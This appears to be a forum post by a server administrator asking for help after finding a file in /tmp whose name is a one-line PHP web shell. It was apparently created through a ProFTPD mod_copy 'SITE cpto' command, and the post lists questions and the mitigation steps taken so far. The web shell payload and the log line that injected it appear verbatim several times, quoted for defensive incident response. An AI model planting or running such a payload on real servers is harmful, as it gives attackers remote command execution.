I just found a file at the /tmp/ directory named .<?php passthru($_GET['cmd']);echo 'm3rg3';?>
Owner and GroupOwner are "proftpd" and "nogroup", respectively, as follows:
-rw-r--r-- 1 proftpd nogroup 89 Apr 9 01:15 .<?php passthru($_GET['cmd']);echo 'm3rg3';?>
FILE CONTENT
proftpd: 45.33.17.183:39686: SITE cpto /tmp/.<?php passthru($_GET['cmd']);echo 'm3rg3';?>
QUESTIONS
- How could one break into my server through ProFTPD?
- What can I do to fix this issue?
- What else should I look for after this finding?
- Is there a default password for the user "proftpd"?
- Can I find the "proftpd" password?
- At the "/tmp/" directory* I see this file
.<?php passthru($_GET['cmd']);echo 'm3rg3';?>which is owned by "proftpd". Does is imply that someone successfully logged through FTP and uploaded that file there? Is there another way that it happened? - How can I find the hole that allowed this happening?
MEASURES TAKEN SO FAR
Changed ProFTPD port from 21 to something else;
Commented
mod_copy.cas suggested on this russian site: http://blog.foxylab.com/popytka-vzloma-moego-servera-cherez-uyazvimost-v-proftpd/Moved the injected file from
/tmp/to another directory, eg.:/tmp/injected_file/Didn't change ANY password (note: ftp is not used on this server).
Searched for all files from user
proftpdusingfind / -user proftpd. Nothing was found, besides the one file mentioned in the beginning.
